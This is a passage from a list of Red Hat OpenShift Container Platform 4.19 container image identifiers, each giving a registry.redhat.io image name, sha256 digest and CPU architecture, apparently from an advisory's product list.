"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
